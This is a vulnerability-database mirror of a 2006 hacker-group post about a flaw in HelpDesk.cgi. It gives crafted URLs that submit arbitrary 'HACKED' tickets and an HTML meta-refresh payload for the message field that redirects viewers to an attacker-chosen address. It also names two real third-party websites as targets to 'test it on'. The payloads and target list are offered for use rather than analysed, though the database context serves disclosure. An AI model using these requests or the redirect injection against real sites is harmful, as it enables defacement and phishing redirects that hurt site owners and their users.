Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13917
HistoryAug 17, 2006 - 12:00 a.m.

HelpDesk.cgi Vulnerability

2006-08-1700:00:00
vulners.com
5
JSON

!!!WWW.SiBERSAVASCiLAR.COM!!!

Title : HelpDesk.cgi Vulnerability

#Author: Crackers_Child

#cont@ct: [email protected]

Usage:

http://[target]/[helpdesk_path]/helpdesk.cgi?probtype=hardware&problem=Describe+your+problem.%0D%0A&name=mitt&submit=Submit+Problem

you can change it :)

http://[target]/[helpdesk_path]/helpdesk.cgi?probtype=HACKED&problem=Describe+your+problem.%0D%0A&name=HACKED&submit=HCKED

test it on

http://www.basementnerds.com/cgi-bin/helpdesk/helpdesk.cgi?probtype=hardware&problem=Describe+your+problem.%0D%0A&name=mitt&submit=Submit+Problem


other exploit is you can write your problems and you can use good codes :)

your name = crackers

your phone =4564fasgf

mail = [email protected]

subject = problem

messeage = <meta http-equiv="refresh" content="0;URL=http://your adress">

test it on

http://www.pa.msu.edu/helpdesk/helpdesk.cgi?main=1&amp;mode=2

:)

greets:

X_ALPEREN_X,Root_MOr And All Other Friends

JSON